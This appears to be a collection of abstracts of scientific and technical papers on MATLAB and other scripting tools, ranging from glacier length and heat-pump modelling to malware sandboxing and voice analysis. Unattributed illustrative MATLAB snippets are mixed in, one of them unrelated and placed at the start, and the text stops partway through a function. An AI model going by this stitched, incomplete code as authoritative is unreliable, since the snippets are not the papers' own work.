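    % Glacier length change along a centreline between two terminus observations.
    centreline = [0 0; 800 150; 1700 220; 2600 400; 3500 480];  % x,y vertices (m)
    seg = sqrt(sum(diff(centreline).^2, 2));     % centreline segment lengths
    cum = [0; cumsum(seg)];                      % arc length at each vertex
    term1 = [3350 465];                          % terminus point, observation 1
    term2 = [3050 430];                          % terminus point, observation 2
    [~, i1] = min(sum((centreline - term1).^2, 2));   % nearest vertex to terminus 1
    [~, i2] = min(sum((centreline - term2).^2, 2));   % nearest vertex to terminus 2
    L1 = cum(i1);  L2 = cum(i2);
    dtYears = 2;                                 % time between observations (assumed)
    fprintf('Length change %.0f m (%.0f m/yr)\n', L2 - L1, (L2 - L1)/dtYears);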
A Survey of Complex Object Technologies for Digital Libraries
NASA Technical Reports Server (NTRS)
Nelson, Michael L.; Argue, Brad; Efron, Miles; Denn, Sheila; Pattuelli, Maria Cristina
2001-01-01
Many early web-based digital libraries (DLs) had implicit assumptions reflected in their architecture that the unit of focus in the DL (frequently "reports" or "e-prints") would only be manifested in a single, or at most a few, common file formats such as PDF or PostScript. DLs have now matured to the point where their contents are commonly no longer simple files. Complex objects in DLs have emerged in response to various requirements, including: simple aggregation of formats and supporting files, bundling additional information to aid digital preservation, creating opaque digital objects for e-commerce applications, and the incorporation of dynamic services with the traditional data files. We examine a representative (but not necessarily exhaustive) number of current and recent historical web-based complex object technologies and projects that are applicable to DLs: Aurora, Buckets, ComMentor, Cryptolopes, Digibox, Document Management Alliance, FEDORA, Kahn-Wilensky Framework Digital Objects, Metadata Encoding & Transmission Standard, Multivalent Documents, Open eBooks, VERS Encapsulated Objects, and the Warwick Framework.
A cascading failure analysis tool for post processing TRANSCARE simulations
DOE Office of Scientific and Technical Information (OSTI.GOV)
This is a MATLAB-based tool to post-process simulation results from the EPRI software TRANSCARE, for massive cascading failure analysis following severe disturbances. There are a few key modules available in this tool, including: 1. automatically creating a contingency list to run TRANSCARE simulations, including substation outages above a certain kV threshold, N-k (1, 2 or 3) generator outages and branch outages; 2. reading in and analyzing a CKO file of PCG definition, an initiating event list, and a CDN file; 3. post-processing all the simulation results saved in a CDN file and performing critical event corridor analysis; 4. providing a summary of TRANSCARE simulations; 5. identifying the most frequently occurring event corridors in the system; and 6. ranking the contingencies using a user-defined security index to quantify consequences in terms of total load loss, total number of cascades, etc.
GEO2D - Two-Dimensional Computer Model of a Ground Source Heat Pump System
James Menart
2013-06-07
This file contains a zipped archive of the many files required to run GEO2D. GEO2D is a computer code for simulating ground source heat pump (GSHP) systems in two dimensions. GEO2D performs a detailed finite difference simulation of the heat transfer occurring within the working fluid, the tube wall, the grout, and the ground. Both horizontal and vertical wells can be simulated with this program, but it should be noted that the vertical well is modeled as a single tube. This program also models the heat pump in conjunction with the heat transfer occurring. GEO2D simulates the heat pump and ground loop as a system. Many results are produced by GEO2D as a function of time and position, such as heat transfer rates, temperatures and heat pump performance. On top of this, an economic comparison is provided between the simulated geothermal system and a comparable air heat pump system or a comparable gas, oil or propane heating system with a vapor-compression air conditioner. The version of GEO2D in the attached file has been coupled to the DOE heating and cooling load software called ENERGYPLUS. This is a great convenience for the user because heating and cooling loads are an input to GEO2D. GEO2D is a user-friendly program that uses a graphical user interface for inputs and outputs. These make entering data simple, and they produce many plotted results that are easy to understand. In order to run GEO2D, access to MATLAB is required. If this program is not available on your computer, you can download the program MCRInstaller.exe, the 64-bit version, from the MATLAB website or from this geothermal repository. This is a free download which will enable you to run GEO2D.
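For orientation only (this is not GEO2D), the following MATLAB sketch advances an explicit two-dimensional finite-difference model of ground heat conduction around a single fixed-temperature pipe cell; the grid size, soil properties and temperatures are assumed:

    % Explicit 2-D finite-difference heat conduction around a buried pipe cell.
    nx = 60; ny = 60; dx = 0.1;              % 6 m x 6 m ground section, 0.1 m cells
    alpha = 1e-6;                            % soil thermal diffusivity (m^2/s)
    dt = 0.2 * dx^2 / alpha;                 % stable explicit time step
    T  = 10 * ones(ny, nx);                  % initial ground temperature (C)
    pipe = false(ny, nx); pipe(30, 30) = true;   % pipe location (single cell here)
    for step = 1:5000
        T(pipe) = 2;                         % working-fluid temperature held fixed
        lap = (circshift(T,[0 1]) + circshift(T,[0 -1]) + ...
               circshift(T,[1 0]) + circshift(T,[-1 0]) - 4*T) / dx^2;
        T = T + alpha * dt * lap;
        T(1,:) = 10; T(end,:) = 10; T(:,1) = 10; T(:,end) = 10;  % far-field boundary
    end
    contourf(T); axis image; colorbar; title('Ground temperature after heat extraction');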
Visual Data Analysis for Satellites
NASA Technical Reports Server (NTRS)
Lau, Yee; Bhate, Sachin; Fitzpatrick, Patrick
2008-01-01
The Visual Data Analysis Package is a collection of programs and scripts that facilitate visual analysis of data available from NASA and NOAA satellites, as well as dropsonde, buoy, and conventional in-situ observations. The package features utilities for data extraction, data quality control, statistical analysis, and data visualization. The Hierarchical Data Format (HDF) satellite data extraction routines from NASA's Jet Propulsion Laboratory were customized for specific spatial coverage and file input/output. Statistical analysis includes the calculation of the relative error, the absolute error, and the root mean square error. Other capabilities include curve fitting through the data points to fill in missing data points between satellite passes or where clouds obscure satellite data. For data visualization, the software provides customizable Generic Mapping Tool (GMT) scripts to generate difference maps, scatter plots, line plots, vector plots, histograms, timeseries, and color fill images.
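The error statistics mentioned above reduce to a few lines of MATLAB; the sample values below are made up for illustration:

    % Absolute, relative and root-mean-square error between satellite and in-situ data.
    obs = [12.1 13.4 11.8 14.0 12.9];        % e.g. buoy measurements
    sat = [12.6 13.1 12.5 13.4 13.2];        % collocated satellite values
    absErr = abs(sat - obs);
    relErr = absErr ./ abs(obs);
    rmse   = sqrt(mean((sat - obs).^2));
    fprintf('mean abs err %.2f, mean rel err %.1f%%, RMSE %.2f\n', ...
            mean(absErr), 100*mean(relErr), rmse);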
Provenance Datasets Highlighting Capture Disparities
2014-01-01
Vistrails [20], Taverna [21] or Kepler [6], and an OS-observing system like PASS [18]. In less granular workflow systems, the data files, scripts...run, etc. are capturable as long as they are executed within the workflow system. In more granular OS-observing systems, the actual reads, writes...“rolling up” very granular information to less granular information. OS-level capture knows that a socket was opened and that data was sent to a foreign
The IATH ELAN Text-Sync Tool: A Simple System for Mobilizing ELAN Transcripts On- or Off-Line
ERIC Educational Resources Information Center
Dobrin, Lise M.; Ross, Douglas
2017-01-01
In this article we present the IATH ELAN Text-Sync Tool (ETST; see http://community.village.virginia.edu/etst), a series of scripts and workflow for playing ELAN files and associated audiovisual media in a web browser either on- or off-line. ELAN has become an indispensable part of documentary linguists' toolkit, but it is less than ideal for…
Advanced Visualization and Interactive Displays (AVID)
2009-04-01
decision maker. The ACESViewer architecture allows the users to pull data from databases, flat files, or user generated via scripting. The...of the equation and is of critical concern as it scales the needs of the polygon fill operations. Numerous users are now using two 30” cinema ...6 module configuration. Based on the architecture of the lab there was only one location that would be suitable without any viewing obstructions
Technical development of PubMed Interact: an improved interface for MEDLINE/PubMed searches
Muin, Michael; Fontelo, Paul
2006-01-01
Background The project aims to create an alternative search interface for MEDLINE/PubMed that may provide assistance to the novice user and added convenience to the advanced user. An earlier version of the project was the 'Slider Interface for MEDLINE/PubMed searches' (SLIM) which provided JavaScript slider bars to control search parameters. In this new version, recent developments in Web-based technologies were implemented. These changes may prove to be even more valuable in enhancing user interactivity through client-side manipulation and management of results. Results PubMed Interact is a Web-based MEDLINE/PubMed search application built with HTML, JavaScript and PHP. It is implemented on a Windows Server 2003 with Apache 2.0.52, PHP 4.4.1 and MySQL 4.1.18. PHP scripts provide the backend engine that connects with E-Utilities and parses XML files. JavaScript manages client-side functionalities and converts Web pages into interactive platforms using dynamic HTML (DHTML), Document Object Model (DOM) tree manipulation and Ajax methods. With PubMed Interact, users can limit searches with JavaScript slider bars, preview result counts, delete citations from the list, display and add related articles and create relevance lists. Many interactive features occur at client-side, which allow instant feedback without reloading or refreshing the page resulting in a more efficient user experience. Conclusion PubMed Interact is a highly interactive Web-based search application for MEDLINE/PubMed that explores recent trends in Web technologies like DOM tree manipulation and Ajax. It may become a valuable technical development for online medical search applications. PMID:17083729
Hamilton, Ryan; Tamminana, Krishna; Boyd, John; Sasaki, Gen; Toda, Alex; Haskell, Sid; Danbe, Elizabeth
2013-04-01
We present a software platform developed by Genentech and MathWorks Consulting Group that allows arbitrary MATLAB (MATLAB is a registered trademark of The MathWorks, Inc.) functions to perform supervisory control of process equipment (in this case, fermentors) via the OLE for process control (OPC) communication protocol, under the direction of an industrial automation layer. The software features automated synchronization and deployment of server control code and has been proven to be tolerant of OPC communication interruptions. Since deployment in the spring of 2010, this software has successfully performed supervisory control of more than 700 microbial fermentations in the Genentech pilot plant and has enabled significant reductions in the time required to develop and implement novel control strategies (months reduced to days). The software is available for download at the MathWorks File Exchange Web site at http://www.mathworks.com/matlabcentral/fileexchange/36866.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Not Available
2011-06-22
The Linac Coherent Light Source (LCLS) is required to deliver a high-quality electron beam for producing coherent X-rays. As a result, high-resolution beam position monitoring is required. The Beam Position Monitor (BPM) digitizer acquires analog signals from the beam line and digitizes them to obtain beam position data. Although Matlab is currently being used to test the BPM digitizer's functions and capability, the Controls Department at SLAC prefers to use the Experimental Physics and Industrial Control System (EPICS). This paper discusses the transition to providing similar, as well as enhanced, functionality to that offered by Matlab for testing the digitizer. Altogether, the improved test stand development system can perform mathematical and statistical calculations with the waveform signals acquired from the digitizer and compute the fast Fourier transform (FFT) of the signals. Finally, logging of meaningful data into files has been added.
Analysis of the possibility of a PGA309 integrated circuit application in pressure sensors
NASA Astrophysics Data System (ADS)
Walendziuk, Wojciech; Baczewski, Michal; Idzkowski, Adam
2016-09-01
This article presents the results of research concerning the analysis of the possibilities of applying a PGA309 integrated circuit in transducers used for pressure measurement. The experiments were done with the use of a PGA309EVM-USB evaluation circuit with a BD|SENSORS pressure sensor. A specially prepared MATLAB script was used to choose the calibration settings and to analyze the results. The article discusses the developed algorithm that processes the measurement results, i.e. the algorithm which calculates the desired gain and the offset adjustment voltage of the transducer measurement bridge in relation to the input signal range of the integrated circuit and the ambient temperature (temperature compensation). The checking procedure was conducted in a measurement laboratory and the obtained results were analyzed and discussed.
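The gain and offset arithmetic described above can be sketched in a few lines of MATLAB; the bridge and output voltages below are illustrative values, not figures from the article:

    % Map a bridge output span onto a desired transducer output range.
    vBridgeMin = 0.002;   % bridge output at zero pressure (V)
    vBridgeMax = 0.020;   % bridge output at full-scale pressure (V)
    vOutMin    = 0.5;     % desired transducer output low (V)
    vOutMax    = 4.5;     % desired transducer output high (V)

    gain   = (vOutMax - vOutMin) / (vBridgeMax - vBridgeMin);   % required gain
    offset = vOutMin - gain * vBridgeMin;                       % required offset (V)
    fprintf('Gain = %.1f V/V, offset = %.3f V\n', gain, offset);

    % Check the mapping at both ends of the input range
    vOut = gain * [vBridgeMin vBridgeMax] + offset;
    disp(vOut)   % should reproduce [0.5 4.5]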
NASA Astrophysics Data System (ADS)
Borsányi, Sz.; Endrődi, G.; Fodor, Z.; Katz, S. D.; Krieg, S.; Ratti, C.; Szabó, K. K.
2012-08-01
We determine the equation of state of QCD for nonzero chemical potentials via a Taylor expansion of the pressure. The results are obtained for N_f = 2 + 1 flavors of quarks with physical masses, on various lattice spacings. We present results for the pressure, interaction measure, energy density, entropy density, and the speed of sound for small chemical potentials. At low temperatures we compare our results with the Hadron Resonance Gas model. We also express our observables along trajectories of constant entropy over particle number. A simple parameterization is given (the Matlab/Octave script parameterization.m, submitted to the arXiv along with the paper), which can be used to reconstruct the observables as functions of T and μ, or as functions of T and S/N.
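The following MATLAB sketch shows the general form of such a Taylor-expanded pressure; the coefficient shapes are invented placeholders and are not the lattice results or the published parameterization.m script:

    % p(T,mu)/T^4 = c0(T) + c2(T) (mu/T)^2 + c4(T) (mu/T)^4, with assumed coefficients.
    T   = linspace(130, 400, 200);              % temperature (MeV)
    c0  = 1.0 + 2.5 ./ (1 + exp((180 - T)/20)); % crossover-like shapes (made up)
    c2  = 0.10 + 0.15 ./ (1 + exp((190 - T)/25));
    c4  = 0.02 ./ (1 + exp((200 - T)/30));
    muOverT = 1.0;                              % mu_B / T
    pOverT4 = c0 + c2*muOverT^2 + c4*muOverT^4;
    plot(T, pOverT4); xlabel('T (MeV)'); ylabel('p/T^4');
    title('Taylor-expanded pressure (illustrative coefficients)');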
Real-time quantitative Schlieren imaging by fast Fourier demodulation of a checkered backdrop
NASA Astrophysics Data System (ADS)
Wildeman, Sander
2018-06-01
A quantitative synthetic Schlieren imaging (SSI) method based on fast Fourier demodulation is presented. Instead of a random dot pattern (as usually employed in SSI), a 2D periodic pattern (such as a checkerboard) is used as a backdrop to the refractive object of interest. The range of validity and accuracy of this "Fast Checkerboard Demodulation" (FCD) method are assessed using both synthetic data and experimental recordings of patterns optically distorted by small waves on a water surface. It is found that the FCD method is at least as accurate as sophisticated, multi-stage, digital image correlation (DIC) or optical flow (OF) techniques used with random dot patterns, and it is significantly faster. Efficient, fully vectorized, implementations of both the FCD and DIC/OF schemes developed for this study are made available as open source Matlab scripts.
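A one-dimensional MATLAB sketch of the carrier-demodulation idea is given below (the published FCD method works in two dimensions on a checkerboard; the carrier period and displacement field here are made up):

    % 1-D Fourier demodulation of a periodic backdrop distorted by refraction.
    N  = 1024;  x = (0:N-1)';
    kc = 2*pi/16;                              % carrier wavenumber (16-px period)
    u  = 2.0*exp(-((x - 512)/80).^2);          % true apparent displacement (px)
    ref = cos(kc*x);                           % undistorted periodic pattern
    img = cos(kc*(x - u));                     % pattern distorted by refraction

    m = 32;  mask = zeros(N,1);  mask([1:m, N-m+2:N]) = 1;   % low-pass filter (FFT bins)
    lp = @(s) ifft(fft(s) .* mask);
    aRef = lp(ref .* exp(-1i*kc*x));           % complex carrier amplitude, reference
    aImg = lp(img .* exp(-1i*kc*x));           % complex carrier amplitude, distorted
    uEst = -angle(aImg .* conj(aRef)) / kc;    % demodulated displacement

    plot(x, u, x, uEst, '--'); legend('true', 'recovered'); xlabel('pixel');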
DOE Office of Scientific and Technical Information (OSTI.GOV)
Harvey, Dustin Yewell
This document is a white paper marketing proposal for Echo™, a data analysis platform designed for efficient, robust, and scalable creation and execution of complex workflows. Echo's analysis management system refers to the ability to track, understand, and reproduce the workflows used for arriving at results and decisions. Echo improves on traditional scripted data analysis in MATLAB, Python, R, and other languages to allow analysts to make better use of their time. Additionally, the Echo platform provides a powerful data management and curation solution, allowing analysts to quickly find, access, and consume datasets. After two years of development and a first release in early 2016, Echo is now available for use with many data types in a wide range of application domains. Echo provides tools that allow users to focus on data analysis and decisions with confidence that results are reported accurately.
Nguyen, Quoc-Thang; Miledi, Ricardo
2003-09-30
Current computer programs for intracellular recordings often lack advanced data management, are usually incompatible with other applications and are also difficult to adapt to new experiments. We have addressed these shortcomings in e-Phys, a suite of electrophysiology applications for intracellular recordings. The programs in e-Phys use Component Object Model (COM) technologies available in the Microsoft Windows operating system to provide enhanced data storage, increased interoperability between e-Phys and other COM-aware applications, and easy customization of data acquisition and analysis thanks to a script-based integrated programming environment. Data files are extensible, hierarchically organized and integrated in the Windows shell by using the Structured Storage technology. Data transfers to and from other programs are facilitated by implementing the ActiveX Automation standard and distributed COM (DCOM). ActiveX Scripting allows experimenters to write their own event-driven acquisition and analysis programs in the VBScript language from within e-Phys. Scripts can reuse components available from other programs on other machines to create distributed meta-applications. This paper describes the main features of e-Phys and how this package was used to determine the effect of the atypical antipsychotic drug clozapine on synaptic transmission at the neuromuscular junction.
RBSE: Product development team research activity deliverables
NASA Technical Reports Server (NTRS)
1992-01-01
The GHG Functions and Extensions to be added to the NASA Electronic Library System (NELS) 1.1 product are described. These functions will implement the 'output request' capability within the Object Browser. The functions will be implemented in two parts. The first part is a code to be added to the Object Browser (X version) to implement menus allowing the user to request that objects be copied to specific media, or that objects be downloaded to the user's system following a specific protocol, or that the object be printed to one of the printers attached to the host system. The second part is shell scripts which support the various menu selections. Additional scripts to support functions within the GHG shell (X version) will also be created along with the X version of the GHG Shell as initial capability for the 27 Mar. prototype. The scripts will be composed of C shell routines that will accept parameters (primary file pathways). Certain limitations in functionality will invoke Mail instead of Oracle Mail since that has yet to be delivered and the NELS invocation will default to the X-Windows version instead of the ASCII version.
jsNMR: an embedded platform-independent NMR spectrum viewer.
Vosegaard, Thomas
2015-04-01
jsNMR is a lightweight NMR spectrum viewer written in JavaScript/HyperText Markup Language (HTML), which provides a cross-platform spectrum visualizer that runs on all computer architectures including mobile devices. Experimental (and simulated) datasets are easily opened in jsNMR by (i) drag and drop on a jsNMR browser window, (ii) by preparing a jsNMR file from the jsNMR web site, or (iii) by mailing the raw data to the jsNMR web portal. jsNMR embeds the original data in the HTML file, so a jsNMR file is a self-transforming dataset that may be exported to various formats, e.g. comma-separated values. The main applications of jsNMR are to provide easy access to NMR data without the need for dedicated software installed and to provide the possibility to visualize NMR spectra on web sites. Copyright © 2015 John Wiley & Sons, Ltd.
Efficient simulation of intrinsic, extrinsic and external noise in biochemical systems.
Pischel, Dennis; Sundmacher, Kai; Flassig, Robert J
2017-07-15
Biological cells operate in a noisy regime influenced by intrinsic, extrinsic and external noise, which leads to large differences of individual cell states. Stochastic effects must be taken into account to characterize biochemical kinetics accurately. Since the exact solution of the chemical master equation, which governs the underlying stochastic process, cannot be derived for most biochemical systems, approximate methods are used to obtain a solution. In this study, a method to efficiently simulate the various sources of noise simultaneously is proposed and benchmarked on several examples. The method relies on the combination of the sigma point approach to describe extrinsic and external variability and the τ-leaping algorithm to account for the stochasticity due to probabilistic reactions. The comparison of our method to extensive Monte Carlo calculations demonstrates an immense computational advantage while losing an acceptable amount of accuracy. Additionally, the application to parameter optimization problems in stochastic biochemical reaction networks is shown, which is rarely applied due to its huge computational burden. To give further insight, a MATLAB script is provided including the proposed method applied to a simple toy example of gene expression. MATLAB code is available at Bioinformatics online. flassig@mpi-magdeburg.mpg.de. Supplementary data are available at Bioinformatics online. © The Author 2017. Published by Oxford University Press. All rights reserved. For Permissions, please e-mail: journals.permissions@oup.com
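As our own minimal illustration (not the authors' supplementary script), the following MATLAB sketch applies tau-leaping to a toy birth-death model of gene expression; poissrnd requires the Statistics and Machine Learning Toolbox:

    % Tau-leaping simulation of mRNA production (rate k1) and degradation (rate k2).
    k1 = 10; k2 = 0.5;             % production and degradation rate constants
    tau = 0.05; tEnd = 20;         % leap size and simulation horizon
    nSteps = round(tEnd/tau);
    x = 0;  traj = zeros(1, nSteps);
    for i = 1:nSteps
        a = [k1, k2*x];                        % reaction propensities
        nFire = poissrnd(a*tau);               % Poisson number of firings per leap
        x = max(x + nFire(1) - nFire(2), 0);   % update copy number, keep >= 0
        traj(i) = x;
    end
    plot((1:nSteps)*tau, traj); hold on;
    plot([0 tEnd], [k1/k2, k1/k2], '--');      % deterministic steady state k1/k2
    xlabel('time'); ylabel('mRNA copy number');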
NASA Technical Reports Server (NTRS)
Brenner, Richard; Lala, Jaynarayan H.; Nagle, Gail A.; Schor, Andrei; Turkovich, John
1994-01-01
This program demonstrated the integration of a number of technologies that can increase the availability and reliability of launch vehicles while lowering costs. Availability is increased with an advanced guidance algorithm that adapts trajectories in real-time. Reliability is increased with fault-tolerant computers and communication protocols. Costs are reduced by automatically generating code and documentation. This program was realized through the cooperative efforts of academia, industry, and government. The NASA-LaRC coordinated the effort, while Draper performed the integration. Georgia Institute of Technology supplied a weak Hamiltonian finite element method for optimal control problems. Martin Marietta used MATLAB to apply this method to a launch vehicle (FENOC). Draper supplied the fault-tolerant computing and software automation technology. The fault-tolerant technology includes sequential and parallel fault-tolerant processors (FTP & FTPP) and authentication protocols (AP) for communication. Fault-tolerant technology was incrementally incorporated. Development culminated with a heterogeneous network of workstations and fault-tolerant computers using AP. Draper's software automation system, ASTER, was used to specify a static guidance system based on FENOC, navigation, flight control (GN&C), models, and the interface to a user interface for mission control. ASTER generated Ada code for GN&C and C code for models. An algebraic transform engine (ATE) was developed to automatically translate MATLAB scripts into ASTER.
Analyzed DTS Data, Guelph, ON Canada
Coleman, Thomas
2015-07-01
Analyzed DTS datasets from active heat injection experiments in Guelph, ON Canada is included. A .pdf file of images including borehole temperature distributions, temperature difference distributions, temperature profiles, and flow interpretations is included as the primary analyzed dataset. Analyzed data used to create the .pdf images are included as a matlab data file that contains the following 5 types of data: 1) Borehole Temperature (matrix of temperature data collected in the borehole), 2) Borehole Temperature Difference (matrix of temperature difference above ambient for each test), 3) Borehole Time (time in both min and sec since the start of a DTS test), 4) Borehole Depth (channel depth locations for the DTS measurements), 5) Temperature Profiles (ambient, active, active off early time, active off late time, and injection).
VESL: The Virtual Earth System Laboratory for Ice Sheet Modeling and Visualization
NASA Astrophysics Data System (ADS)
Cheng, D. L. C.; Larour, E. Y.; Quinn, J. D.; Halkides, D. J.
2017-12-01
We present the Virtual Earth System Laboratory (VESL), a scientific modeling and visualization tool delivered through an integrated web portal. This allows for the dissemination of data, simulation of physical processes, and promotion of climate literacy. The current iteration leverages NASA's Ice Sheet System Model (ISSM), a state-of-the-art polar ice sheet dynamics model developed at the Jet Propulsion Laboratory and UC Irvine. We utilize the Emscripten source-to-source compiler to convert the C/C++ ISSM engine core to JavaScript, and bundled pre/post-processing JS scripts to be compatible with the existing ISSM Python/MATLAB API. Researchers using VESL will be able to effectively present their work for public dissemination with little to no additional post-processing. Moreover, the portal allows for real-time visualization and editing of models, cloud-based computational simulation, and downloads of relevant data. This allows for faster publication in peer-reviewed journals and adaptation of results for educational applications. Through application of this concept to multiple aspects of the Earth system, VESL is able to broaden data applications in the geosciences and beyond. At this stage, we still seek feedback from the greater scientific and public outreach communities regarding the ease of use and feature set of VESL. As we plan its expansion, we aim to achieve more rapid communication and presentation of scientific results.
RGG: A general GUI Framework for R scripts
Visne, Ilhami; Dilaveroglu, Erkan; Vierlinger, Klemens; Lauss, Martin; Yildiz, Ahmet; Weinhaeusel, Andreas; Noehammer, Christa; Leisch, Friedrich; Kriegner, Albert
2009-01-01
Background R is the leading open source statistics software with a vast number of biostatistical and bioinformatical analysis packages. To exploit the advantages of R, extensive scripting/programming skills are required. Results We have developed a software tool called R GUI Generator (RGG) which enables the easy generation of Graphical User Interfaces (GUIs) for the programming language R by adding a few Extensible Markup Language (XML) tags. RGG consists of an XML-based GUI definition language and a Java-based GUI engine. GUIs are generated at runtime from GUI tags that are embedded into the R script. User GUI input is returned to the R code and replaces the XML tags. RGG files can be developed using any text editor. The current version of RGG is available as a stand-alone software (RGGRunner) and as a plug-in for JGR. Conclusion RGG is a general GUI framework for R that has the potential to introduce R statistics (R packages, built-in functions and scripts) to users with limited programming skills and helps to bridge the gap between R developers and GUI-dependent users. RGG aims to abstract the GUI development from individual GUI toolkits by using an XML-based GUI definition language. Thus RGG can be easily integrated in any software. The RGG project further includes the development of a web-based repository for RGG-GUIs. RGG is an open source project licensed under the Lesser General Public License (LGPL) and can be downloaded freely. PMID:19254356
Root canal anatomy preservation of WaveOne reciprocating files with or without glide path.
Berutti, Elio; Paolino, Davide Salvatore; Chiandussi, Giorgio; Alovisi, Mario; Cantatore, Giuseppe; Castellucci, Arnaldo; Pasqualini, Damiano
2012-01-01
This study evaluated the influence of glide path on canal curvature and axis modification after instrumentation with WaveOne Primary reciprocating files. Thirty ISO 15, 0.02 taper Endo Training Blocks were used. In group 1, glide path was created with PathFile 1, 2, and 3 at working length, whereas in group 2, glide path was not performed. In both groups, canals were shaped with WaveOne Primary reciprocating files at working length. Preinstrumentation and postinstrumentation digital images were superimposed and processed with Matlab r2010b software to analyze the curvature radius ratio (CRr) and the relative axis error (rAe), representing canal curvature modification. Data were analyzed with 1-way balanced analyses of variance at 2 levels (P < .05). Glide path was found to be extremely significant for both CRr parameter (F = 9.59; df = 1; P = .004) and rAe parameter (F = 13.55; df = 1; P = .001). Canal modifications seem to be significantly reduced when previous glide path is performed by using the new WaveOne nickel-titanium single-file system. Copyright © 2012 American Association of Endodontists. Published by Elsevier Inc. All rights reserved.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Walkup, Elizabeth
This software is an analyzer for automated sandbox analysis of malware on the OS X operating system. It runs inside an OS X virtual machine to collect data about what happens when a given file is opened or run. As of August 2014, there was no sandbox software for Mac OS X malware, as it requires different methods from those used on the Windows OS (which most sandboxes are written for). This software adds OS X analysis capabilities to an existing open-source sandbox, Cuckoo Sandbox (http://cuckoosandbox.org/), which previously only worked for Windows. The analyzer itself can take many different types of files as input: the traditional Mach-O and FAT executables, .app files, zip files, Python scripts, Java archives, and web pages, as well as PDFs and other documents. While the file is running, the analyzer also simulates rudimentary human interaction with clicks and mouse movements in order to bypass the tests some malware use to see if they are being analyzed. The analyzer outputs several different kinds of data: function call traces, network captures, screenshots, and all created and modified files. This work also includes a static analysis Cuckoo module for Mach-O binary files. It extracts file structures, code library imports and exports, and signatures. This data can be used along with the analyzer results to create signatures for malware.
Jain, Niharika; Pawar, Ajinkya M.; Ukey, Piyush D.; Jain, Prashant K.; Thakur, Bhagyashree; Gupta, Abhishek
2017-01-01
Objectives: To compare the relative axis modification and canal concentricity after glide path preparation with a 20/0.02 hand K-file (NITIFLEX®) and a 20/0.04 rotary file (HyFlex™ CM) with subsequent instrumentation with a 1.5 mm self-adjusting file (SAF). Materials and Methods: One hundred and twenty ISO 15, 0.02 taper, Endo Training Blocks (Dentsply Maillefer, Ballaigues, Switzerland) were acquired and randomly divided into the following two groups (n = 60): group 1, establishing glide path till 20/0.02 hand K-file (NITIFLEX®) followed by instrumentation with 1.5 mm SAF; and group 2, establishing glide path till 20/0.04 rotary file (HyFlex™ CM) followed by instrumentation with 1.5 mm SAF. Pre- and post-instrumentation digital images were processed with MATLAB R2013 software to identify the central axis, and then superimposed using digital imaging software (Picasa 3.0 software, Google Inc., California, USA) taking five landmarks as reference points. Student's t-test for pairwise comparisons was applied with the level of significance set at 0.05. Results: Training blocks instrumented with the 20/0.04 rotary file and SAF were associated with less deviation in canal axis (at all five marked points), representing better canal concentricity compared to those in which the glide path was established by 20/0.02 hand K-files followed by SAF instrumentation. Conclusion: Canal geometry is better maintained after SAF instrumentation with a prior glide path established with a 20/0.04 rotary file. PMID:28855752
UAV Swarm Tactics: An Agent-Based Simulation and Markov Process Analysis
2013-06-01
CRN, Common Random Numbers; CSV, Comma Separated Values; DoE, Design of Experiment; GLM, Generalized Linear Model; HVT, High Value Target; JAR, Java ARchive; JMF, Java Media Framework; JRE, Java Runtime Environment; Mason, Multi-Agent Simulator Of Networks; MOE, Measure Of Effectiveness; MOP, Measures Of Performance ... with every set several times, and to write a CSV file with the results. Rather than scripting the agent behavior deterministically, the agents should
Information Security Considerations for Applications Using Apache Accumulo
2014-09-01
... Distributed File System; INSCOM, United States Army Intelligence and Security Command; JPA, Java Persistence API; JSON, JavaScript Object Notation; MAC, Mandatory ... MySQL [13]. BigTable can process 20 petabytes per day [14]. High degree of scalability on commodity hardware. NoSQL databases do not rely on highly ... manipulation in relational databases. NoSQL databases each have a unique programming interface that uses a lower-level procedural language (e.g., Java
The NCAR Research Data Archive's Hybrid Approach for Data Discovery and Access
NASA Astrophysics Data System (ADS)
Schuster, D.; Worley, S. J.
2013-12-01
The NCAR Research Data Archive (RDA http://rda.ucar.edu) maintains a variety of data discovery and access capabilities for its 600+ dataset collections to support the varying needs of a diverse user community. In-house developed and standards-based community tools offer services to more than 10,000 users annually. By number of users the largest group is external and accesses the RDA through web-based protocols; the internal NCAR HPC users are fewer in number, but typically access more data volume. This paper will detail the data discovery and access services maintained by the RDA to support both user groups, and show metrics that illustrate how the community is using the services. The distributed search capability enabled by standards-based community tools, such as Geoportal and an OAI-PMH access point that serves multiple metadata standards, provides pathways for external users to initially discover RDA holdings. From here, in-house developed web interfaces leverage primary discovery-level metadata databases that support keyword and faceted searches. Internal NCAR HPC users, or those familiar with the RDA, may go directly to the dataset collection of interest and refine their search based on rich file collection metadata. Multiple levels of metadata have proven to be invaluable for discovery within terabyte-sized archives composed of many atmospheric or oceanic levels, hundreds of parameters, and often numerous grid and time resolutions. Once users find the data they want, their access needs may vary as well. A THREDDS data server running on targeted dataset collections enables remote file access through OPeNDAP and other web-based protocols, primarily for external users. In-house developed tools give all users the capability to submit data subset extraction and format conversion requests through scalable, HPC-based delayed-mode batch processing. Users can monitor their RDA-based data processing progress and receive instructions on how to access the data when it is ready. External users are provided with RDA server-generated scripts to download the resulting request output. Similarly, they can download native dataset collection files or partial files using Wget- or cURL-based scripts supplied by the RDA server. Internal users can access the resulting request output or native dataset collection files directly from centralized file systems.
Standardization of pitch-range settings in voice acoustic analysis.
Vogel, Adam P; Maruff, Paul; Snyder, Peter J; Mundt, James C
2009-05-01
Voice acoustic analysis is typically a labor-intensive, time-consuming process that requires the application of idiosyncratic parameters tailored to individual aspects of the speech signal. Such processes limit the efficiency and utility of voice analysis in clinical practice as well as in applied research and development. In the present study, we analyzed 1,120 voice files, using standard techniques (case-by-case hand analysis), taking roughly 10 work weeks of personnel time to complete. The results were compared with the analytic output of several automated analysis scripts that made use of preset pitch-range parameters. After pitch windows were selected to appropriately account for sex differences, the automated analysis scripts reduced processing time of the 1,120 speech samples to less than 2.5 h and produced results comparable to those obtained with hand analysis. However, caution should be exercised when applying the suggested preset values to pathological voice populations.
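As an illustration of the idea of preset, sex-specific pitch windows, the following MATLAB sketch estimates a mean F0 with a windowed autocorrelation search; the window values (75-300 Hz for males, 100-500 Hz for females), frame sizes, and voicing threshold are assumptions for illustration, not the presets used in the study.

```matlab
% Minimal sketch: mean F0 of a voice sample via autocorrelation, with the
% candidate-lag search restricted to an assumed sex-specific pitch window.
function f0 = meanF0(x, fs, sexLabel)
    if strcmpi(sexLabel, 'male')
        range = [75 300];                    % Hz, assumed preset
    else
        range = [100 500];                   % Hz, assumed preset
    end
    frameLen = round(0.04 * fs);             % 40 ms analysis frames
    hop      = round(0.01 * fs);             % 10 ms hop
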